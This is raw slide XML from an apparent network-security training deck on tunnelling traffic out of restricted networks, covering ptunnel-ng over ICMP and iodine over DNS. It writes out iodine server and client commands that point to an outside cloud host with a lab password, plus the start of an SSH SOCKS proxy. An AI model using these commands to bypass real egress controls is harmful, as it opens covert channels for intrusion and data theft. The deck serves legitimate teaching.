        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8859424" y="818147"/>
            <a:ext cx="4178623" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-r remote server address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-R remote server port</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-m magic byte value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-P password</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9B4DFC2-9A14-4E32-8E3E-62A6703B61BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="683377" y="3005383"/>
            <a:ext cx="9341017" cy="2002264"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0FDBBE15-0F6E-4035-8576-FD439438D2E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83377" y="5407518"/>
            <a:ext cx="9782678" cy="814178"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7608A9C-D11E-4313-A491-CD28F09AE5C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="334461" y="5019806"/>
            <a:ext cx="6093994" cy="375552"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" marR="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="70AD47"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="70AD47"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ptunnel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="70AD47"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>-ng is now listening on port 2222</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DE5A291-9DC0-43A6-9EAD-52DAA855D59E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="587125" y="6321812"/>
            <a:ext cx="6093994" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t># start </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> connection over ICMP tunnel</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23402522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26798C0-3120-4922-A2D8-16E731A647E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1524000" y="2235200"/>
            <a:ext cx="9144000" cy="2387600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>“We only let DNS out from there”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20192158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CE1DE-E9DC-4514-B135-07BFB3AFF59A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DNS Tunnelling</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BA4A05F-AFBF-4432-90F1-AD0187C6AF73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Iodine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://github.com/yarrick/iodine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4225C16-2B0B-43CE-B63D-EA6616E5C4EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4028638" y="583531"/>
            <a:ext cx="7865238" cy="5690937"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32831901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CE1DE-E9DC-4514-B135-07BFB3AFF59A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DNS Tunnelling</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0F48CE8-567D-4BAD-897E-BA642993D4A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="532396" y="2380860"/>
            <a:ext cx="10271961" cy="1799916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" marR="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="70AD47"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t># Install iodine on kali client and cloud server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> apt-get update</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> apt-get install iodine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5B9BD5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="70AD47"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t># server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>sbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>iodined</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> -f 172.16.16.1 proxy.bisplabdomain.com -P ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>bisp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36667492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CE1DE-E9DC-4514-B135-07BFB3AFF59A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DNS Tunnelling</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0F48CE8-567D-4BAD-897E-BA642993D4A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="532396" y="2380860"/>
            <a:ext cx="11659604" cy="1569340"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" marR="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="70AD47"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t># client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>iodine -f 34.207.70.4 proxy.nuenglandserver.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> -D 8080 -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
